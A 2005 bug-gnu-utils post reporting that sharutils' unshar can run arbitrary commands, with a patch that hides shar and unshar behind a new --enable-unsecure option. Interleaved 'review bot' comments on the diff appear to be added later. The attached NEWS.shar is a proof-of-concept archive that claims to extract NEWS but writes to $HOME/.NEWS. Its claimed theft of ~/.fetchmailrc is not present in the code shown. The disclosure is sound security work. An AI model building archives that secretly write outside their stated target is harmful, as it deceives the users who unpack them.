bug-gnu-utils

unshar is unsafe


From: Bruno Haible
Subject: unshar is unsafe
Date: Wed, 27 Jul 2005 14:07:36 +0200
User-agent: KMail/1.5

To: address@hidden
Cc: Bruce Korb  <address@hidden>
Subject: unshar is unsafe

Hi,

It should be well-known that "unshar" is unsafe: In the current
implementation, it allows an attacker to execute any shell commands.
For example, the attached file NEWS.shar, when unshared, pretends to
create a file NEWS, but instead overwrites ~/.NEWS (it could just as
well overwrite or append a few lines to your ~/.profile) and sends me
your ~/.fetchmailrc. (Try it :-)).

$ unshar < NEWS.shar 
Standard-Eingabe:
x - Sperrverzeichnis `_sh08096': wurde angelegt
x - packe aus NEWS (Text)
x - Sperrverzeichnis `_sh08096': gelöscht

For this reason, it should be possible to install the useful
programs 'uuencode', 'uudecode', and 'mail-files', without the dangerous
programs
  - unshar   (totally unsecure implementation)
  - shar     (educates people to unsecure behaviour)
  - mailshar (unsecure since it invokes shar)
  - remsync  (unsecure since it invokes mailshar)
and the program
  - compress-dummy (only used by 'shar', useless on its own)

And moreover, since the default installation of a GNU system should be
secure, these programs should not be installed by default, only upon
request.

Find attached a crude patch that does this.

          Bruno


ChangeLog:
2005-07-26  Bruno Haible  <address@hidden>

        * configure.ac (ADD_SCRIPT): Remove mail-files.
        (UNSECURE): New installer option --enable-unsecure.

src/ChangeLog:
2005-07-26  Bruno Haible  <address@hidden>

        * Makefile.am (bin_PROGRAMS): Add shar and unshar only if UNSECURE
        is enabled.
        (bin_SCRIPTS): Initialize with "mail-files". Add the ADD_SCRIPTS
        only if UNSECURE is enabled.

doc/ChangeLog:
2005-07-26  Bruno Haible  <address@hidden>

        * Makefile.am (dist_man1_MANS): Add shar.1 and unshar.1 only if
        UNSECURE is enabled.

diff -r -c3 sharutils-4.4.orig/configure.ac sharutils-4.4/configure.ac
*** sharutils-4.4.orig/configure.ac     2005-07-10 17:57:57.000000000 +0200
--- sharutils-4.4/configure.ac  2005-07-27 01:29:07.000000000 +0200
***************
*** 22,28 ****
  
  dnl AC_ARG_PROGRAM
  
! AC_SUBST(ADD_SCRIPT, ["mail-files mailshar"])
  
  AC_PROG_CC
  AC_PROG_INSTALL
--- 22,28 ----
  
  dnl AC_ARG_PROGRAM
  
! AC_SUBST(ADD_SCRIPT, ["mailshar"])
  
  AC_PROG_CC
  AC_PROG_INSTALL
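Review bot: dropping mail-files from ADD_SCRIPT is the right split, but the variable name no longer says what it now holds: after this hunk ADD_SCRIPT carries only scripts that src/Makefile.am installs behind the UNSECURE conditional. A one-line comment above `AC_SUBST(ADD_SCRIPT, ["mailshar"])` stating that everything in it is installed only with --enable-unsecure would spare the next reader a trip to src/Makefile.am.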
***************
*** 103,108 ****
--- 103,114 ----
        [disable installation of uuencode and uudecode])])
  AM_CONDITIONAL([UUCODE], [test "x$enable_uucode" != xno])
  
+ AC_ARG_ENABLE(unsecure,
+   [AS_HELP_STRING([--enable-unsecure],
+      [enable installation of the unsecure programs shar, unshar, mailshar,
+       remsync])])
+ AM_CONDITIONAL([UNSECURE], [test "x$enable_unsecure" = xyes])
+ 
  AM_GNU_GETTEXT
  AM_GNU_GETTEXT_VERSION([0.14.4])
  AM_WITH_DMALLOC
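Review bot: the help string for --enable-unsecure promises remsync, yet nothing in this patch adds remsync to ADD_SCRIPT or bin_SCRIPTS (the visible ADD_SCRIPT is just `mailshar`); either remsync is appended to ADD_SCRIPT elsewhere in configure.ac, in which case this is fine, or the help text should not list it. Since `test "x$enable_unsecure" = xyes` makes shar, unshar and mailshar vanish from a plain `./configure && make install`, the new switch also deserves a line in NEWS or README so packagers are not surprised by missing binaries.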
diff -r -c3 sharutils-4.4.orig/src/Makefile.am sharutils-4.4/src/Makefile.am
*** sharutils-4.4.orig/src/Makefile.am  2005-07-09 02:46:46.000000000 +0200
--- sharutils-4.4/src/Makefile.am       2005-07-27 01:13:14.000000000 +0200
***************
*** 17,27 ****
  
  ## Process this file with automake to produce Makefile.in.
  
! bin_PROGRAMS = shar unshar
  if UUCODE
    bin_PROGRAMS += uuencode uudecode
  endif
! bin_SCRIPTS = $(ADD_SCRIPT)
  EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
  
  DISTCLEANFILES = $(bin_SCRIPTS)
--- 17,31 ----
  
  ## Process this file with automake to produce Makefile.in.
  
! bin_PROGRAMS =
! bin_SCRIPTS = mail-files
  if UUCODE
    bin_PROGRAMS += uuencode uudecode
  endif
! if UNSECURE
!   bin_PROGRAMS += shar unshar
!   bin_SCRIPTS += $(ADD_SCRIPT)
! endif
  EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
  
  DISTCLEANFILES = $(bin_SCRIPTS)
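Review bot: the src/ChangeLog entry names ADD_SCRIPTS, but the variable the hunk actually uses is ADD_SCRIPT (`bin_SCRIPTS += $(ADD_SCRIPT)`); fix the ChangeLog. Initialising `bin_PROGRAMS =` to empty before the conditionals is needed for the `+=` lines inside `if UNSECURE` to be accepted by automake, so that part is right; leaving `EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync` untouched is also correct, because the scripts must still ship in the tarball even when not installed, and a short comment saying so would pre-empt the question the cover letter invites about compress-dummy.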
diff -r -c3 sharutils-4.4.orig/doc/Makefile.am sharutils-4.4/doc/Makefile.am
*** sharutils-4.4.orig/doc/Makefile.am  2005-07-09 02:32:21.000000000 +0200
--- sharutils-4.4/doc/Makefile.am       2005-07-27 01:02:15.000000000 +0200
***************
*** 19,31 ****
  
  info_TEXINFOS = sharutils.texi
  
! dist_man1_MANS = shar.1 unshar.1
  
  if UUCODE
    dist_man1_MANS += uuencode.1 uuencode.5
    man1_MANS = uudecode.1
  endif
  
  CLEANFILES = $(man1_MANS)
  
  EXTRA_DIST = doclicense.texi
--- 19,35 ----
  
  info_TEXINFOS = sharutils.texi
  
! dist_man1_MANS =
  
  if UUCODE
    dist_man1_MANS += uuencode.1 uuencode.5
    man1_MANS = uudecode.1
  endif
  
+ if UNSECURE
+   dist_man1_MANS += shar.1 unshar.1
+ endif
+ 
  CLEANFILES = $(man1_MANS)
  
  EXTRA_DIST = doclicense.texi
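Review bot: gating shar.1 and unshar.1 behind `if UNSECURE` keeps the man pages consistent with src/Makefile.am, but `info_TEXINFOS = sharutils.texi` stays unconditional, so the installed manual will still present shar and unshar as available programs. Either a sentence in the manual pointing at --enable-unsecure or conditionalising the relevant chapter would keep documentation and installation in step.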



============================= NEWS.shar =============================
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.4).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Made on 2005-07-27 00:21 CEST by <address@hidden>.
# Source directory was `/packages/sharutils-4.4'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode       name
# ------ ---------- ------------------------------------------
#   2831 -rwxr-xr-x NEWS
#
save_IFS="${IFS}"
IFS="${IFS}:"
gettext_dir=FAILED
locale_dir=FAILED
first_param="$1"
for dir in $PATH
do
  if test "$gettext_dir" = FAILED && test -f $dir/gettext \
     && ($dir/gettext --version >/dev/null 2>&1)
  then
    case `$dir/gettext --version 2>&1 | sed 1q` in
      *GNU*) gettext_dir=$dir ;;
    esac
  fi
  if test "$locale_dir" = FAILED && test -f $dir/shar \
     && ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
  then
    locale_dir=`$dir/shar --print-text-domain-dir`
  fi
done
IFS="$save_IFS"
if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
then
  echo=echo
else
  TEXTDOMAINDIR=$locale_dir
  export TEXTDOMAINDIR
  TEXTDOMAIN=sharutils
  export TEXTDOMAIN
  echo="$gettext_dir/gettext -s"
fi
if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then
  if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then
    shar_n= shar_c='
'
  else
    shar_n=-n shar_c=
  fi
else
  shar_n= shar_c='\c'
fi
if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f 200112312359.59 && test -f $$.touch; then
  shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f 123123592001.59 && test ! -f 123123592001.5 && test -f $$.touch; then
  shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 && test -f $$.touch; then
  shar_touch='touch -am $3$4$5$6$2 "$8"'
else
  shar_touch=:
  echo
  $echo 'WARNING: not restoring timestamps.  Consider getting and'
  $echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
#
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': "$shar_c
if mkdir _sh08096; then
  $echo 'created'
else
  $echo 'failed to create'
  exit 1
fi
# ============= NEWS ==============
if test -f 'NEWS' && test "$first_param" != -c; then
  $echo 'x -' SKIPPING 'NEWS' '(file already exists)'
else
  $echo 'x -' extracting 'NEWS' '(text)'
  sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
GNU sharutils NEWS - User visible changes.
Copyright (C) 1994, 1995, 1996, 2002, 2004, 2005 Free Software Foundation, Inc.
X
Version 4.4 - July 2005, by Bruce Korb
X
* autotool cleanup
* Make a non-alpha release this time.
* Ensure a "intmax_t" exists in the code.
X
X 
Version 4.3.81 - June 2005, by Bruce Korb
X
* Compatibility:  True 64 does not have "snprintf"
* Updated FSF address
X
X 
X
Version 4.3.80 - April 2005, by Bruce Korb
X
* Buglet: Unlink the temporary file when unsharing from stdin.
X
X 
X
Version 4.3.79 - April 2005, by Bruce Korb
X
* rewrote the temporary file handling in unshar to avoid both a theoretical
X  timing hole (hitting it requires cooperation) and a buffer overrun
X  attack (a file name exceeding 1K).
* new translations and updates.  They are all now missing two messages:
X  "allocate file name buffer" and "allocate file buffer".  *sigh*.
X
X 
X
Version 4.3.78 - January 2005, by Bruce Korb
X
* fixed test to not require updates for every release number
* fixed the uuencode man page so that docbook generation can work correctly.
X
X 
Version 4.3.77 - September 2004, by Bruce Korb
X
* Fixed a buffer overrun exploit
X
X 
Version 4.3.76 - December 2002, by Karl Eichwalder
X
* Updated translations: de et fr sv tr.
X
X 
Version 4.3.75 - December 2002, by Karl Eichwalder
X
* Fix compatibility issues (by Bruno Haible).
X
* Support bzip2 as an alternative to gzip (by Bruno Haible).
X
* New translations: ca et hu.
X
* Updated translations: da de ja sv tr zh_TW.
X
X 
Version 4.3.74 - July 2002, by Karl Eichwalder
X
* Many portability fixes (by Bruno Haible).
X
* Updated translation: fr.
X
X 
Version 4.3.73 - July 2002, by Karl Eichwalder
X
* Add support for large files, e.g., files larger than 2 GiB on hosts
X  where 'long' is 32 bits wide (by Paul Eggert).
X
X 
Version 4.3.72 - July 2002, by Karl Eichwalder
X
* Updated translations: fr sv.
X
X 
Version 4.3.71 - July 2002, by Karl Eichwalder
X
* Updated translations: da de.
X
X 
Version 4.3.70 - July 2002, by Karl Eichwalder
X
* Don't install 'compress' link by default; provide
X  --enable-compress-link configure option.
X
* Fix uudecode output file handling.
X
* Updated translations: de tr.
X
X 
Version 4.3.61 - July 2002, by Karl Eichwalder
X
* Re-add the intl subdirectory (libintl from gettext).
X
* Bugfixes.
X
X 
Version 4.3.60 - June 2002, by Karl Eichwalder
X
* Provide a 'compress-dummy' script.  Install it if 'compress' isn't
X  available.  Create a link 'compress' pointing to 'compress-dummy';
X  thus it is possible to unshar legacy shar files calling
X  'compress -d'.
X
* shar: Don't offer '-Z' resp. '--compress' if the system doesn't
X  support 'compress'.
X
X 
Version 4.3.52 - June 2002, by Karl Eichwalder
X
* sync more files coming with automake and related frame work files.
X
* fix temp file races (shar).
X
* fix Y2K bug (shar).
X
* allow spaces in file names (uudecode).
SHAR_EOF
  (set 20 05 07 22 23 38 11 "$HOME/.NEWS"; eval "$shar_touch") &&
  chmod 0755 "$HOME/.NEWS" ||
  $echo 'restore of' 'NEWS' 'failed'
  if ( md5sum --help </dev/null 2>&1 | grep 'sage: md5sum \[' ) >/dev/null 2>&1 \
  && ( md5sum --version </dev/null 2>&1 | grep -v 'textutils 1.12' ) >/dev/null; then
    md5sum -c << SHAR_EOF >/dev/null 2>&1 \
    || $echo 'NEWS:' 'MD5 check failed'
23c39bbc9cb029b1881b9dfcbbfe0209  NEWS
SHAR_EOF
  else
    shar_count="`LC_ALL=C wc -c < "$HOME/.NEWS"`"
    test 2831 -eq "$shar_count" ||
    $echo 'NEWS:' 'original size' '2831,' 'current size' "$shar_count!"
  fi
fi
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': " $shar_c
if rm -fr _sh08096; then
  $echo 'removed'
else
  $echo 'failed to remove'
fi
exit 0
